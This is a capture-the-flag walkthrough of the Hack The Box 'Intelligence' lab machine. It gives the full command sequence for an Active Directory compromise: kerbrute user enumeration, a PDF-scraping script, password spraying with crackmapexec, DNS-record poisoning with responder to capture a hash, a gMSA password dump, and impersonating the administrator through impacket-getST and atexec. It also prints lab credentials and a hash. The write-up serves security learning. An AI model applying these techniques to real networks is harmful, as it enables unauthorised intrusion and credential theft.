Scanning
Let’s start scanning using nmap
nmap -p- -sV -sC -A 10.10.10.248
Here we find bunch of open ports and Domain i.e. intelligence.htb. I added domain and server ip inside my /etc/hosts file
Let’s start enumerating
Accessing & Enumerating Port 80
After accessing port 80 we get this web page
After going through whole page i find two pdf files
I downloaded them using wget, but sadly not able to understand file content language. Then i decided extracting file metadata using exiftool
exiftool 2020-01-01-upload.pdf
Here i see a username inside Creator field. I tried verifying this user if it exist or not in AD environment using kerbrute script.
I saved this username inside a file named as user.txt and using kerbrute userenum feature i try bruteforcing this
./kerbrute userenum -v --dc 10.10.10.248 -d intelligence.htb user.txt
And we found this is valid username that means creator hold username.
I did same on second pdf and found other user named as Jose.Williams
I tried finding if any user had preauthentication disabled using impacket-GetNPUsers but found nothing :(
I tried bruteforcing smb password for this user but no luck. Then i tried Enumerating LDAP and DNS but no luck either :(
Then i go back to website and found we can’t directly access /document but we can fuzz more pdf as pdf format is in YYYY-MM-DD-upload.pdf
URL: http://intelligence.htb/documents/
I created a python script that first check if pdf of each month and date exist of not and if exist then it’ll download in my system.
import requests
# Base URL to check the existence of the PDF
base_url = "http://intelligence.htb/documents/"
# Loop through all months (01 to 12)
for month in range(1, 13):
# Format the month to two digits
month_str = f"{month:02d}"
# Loop through all days (01 to 31)
for day in range(1, 32):
# Format the day to two digits
day_str = f"{day:02d}"
# Create the filename
filename = f"2020-{month_str}-{day_str}-upload.pdf"
# Full URL
url = base_url + filename
# Check if the file exists
response = requests.head(url)
if response.status_code == 200:
print(f"File found: {filename}. Downloading...")
# If it exists, download the file
response = requests.get(url)
with open(filename, 'wb') as f:
f.write(response.content)
else:
print(f"File not found: {filename}")After running this script i got bunch of pdf :( lot of work
Here i decide to extract all usernames from pdf and stored inside a file name user.txt. For doing this instead of exiftool this command use strings on all pdfs and extract all Creator name and stored them inside a file.
cat *.pdf | strings | grep Creator | cut -d '(' -f 2 | cut -d ')' -f 1 | grep -v Tex | grep -v TeX > user.txt
Now i tried finding any user which had preauthentication disable to we can grab it’s TGS ticket using impacket-GetNPUsers
impacket-GetNPUsers -dc-ip 10.10.10.248 intelligence.htb/ -usersfile user.txt -no-passBut found none :(
Then i decide to check all pdf content, For making it easy i upload all of them https://smallpdf.com/ so i can see all of them on one page.
After going through all pages i found a pdf which contain cleartext password.
Now we have user list and a password. I tried password spraying using crackmapexec for samba service
crackmapexec smb 10.10.10.248 -u user.txt -p "NewIntelligenceCorpUser9876"
Got a valid username in which we can user found password :)
Using smbclient i list shares of this user
smbclient -L //10.10.10.248 --user Tiffany.Molina
Now using Users share with smbclient and credentials i gain access to smb
smbclient //10.10.10.248/Users --user Tiffany.Molina --password NewIntelligenceCorpUser9876
and inside Desktop i found user.txt flag :)
Then i access IT share and found a script named as downdetector.ps1
i downloaded this powershell script on my local system and read the script content
��# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}The script checks the status of web servers with DNS records starting with “web” and sends an email from Ted Graves User if any of these servers are down.
Here we can perform MITM and grab this user hash using kerbrelayx scritp dnstool.py and responder.
python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a add -r 'webprooplayer' -d 10.10.14.34 10.10.10.248
Now run responder on tun0 interface and after 5 min you’ll get Ted Graves User hash
sudo responder -I tun0
I crack this hash using john the ripper tool
we now have Ted user password but still unable to logon anywhere :(
didn’t found anything useful in smb too. Then I decided to run bloodhound-python to enumerate the user privileges.
bloodhound-python -c All -u 'Ted.Graves' -p 'Mr.Teddy' -d intelligence.htb -ns 10.10.10.248 --zipI uploaded zip file inside bloodhound then i mark Tiffany.Molina & Ted.Graves as owned.
After little bit analysing i found this:
itsupport group have ReadGMSAPassword over the svc_int user little bit search on google get me a github page : https://github.com/micahvandeusen/gMSADumper
I cloned this repository and using this i try to dump svc_init TGT hash
python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
I got this TGT hash of svc_init
Pass The Ticket (PTT)
After little bit searching i found out a blog that show getTGT.py (a impacket script) that we can use to Request Service Ticket of administrator user.
impacket-getST 'intelligence.htb/svc_int$' -spn WWW/dc.intelligence.htb -hashes ':51e4932f13712047027300f869d07ab6' -impersonate administrator
After trying this i got a error i.e. Clock skew too great.
I search about this on google and found a medium blog that work like charm for me :)
I followed same step and it start working
Steps i follow:
sutimedatectl set-ntp offrdate -n 10.10.10.248impacket-getST 'intelligence.htb/svc_int$' -spn WWW/dc.intelligence.htb -hashes ':51e4932f13712047027300f869d07ab6' -impersonate administrator
Then i tried using this with psexec but didn’t work :) stuck again.
Later i found out that impacket had a script name atexec that we can use to remotely execute command for this i export the administrator user service ticket
export KRB5CCNAME=administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccacheThen using atexec i execute whoami command
Now replacing whoami with type and root flag location i grab root.txt flag :)
Intelligence Machine Solved Successfully!!
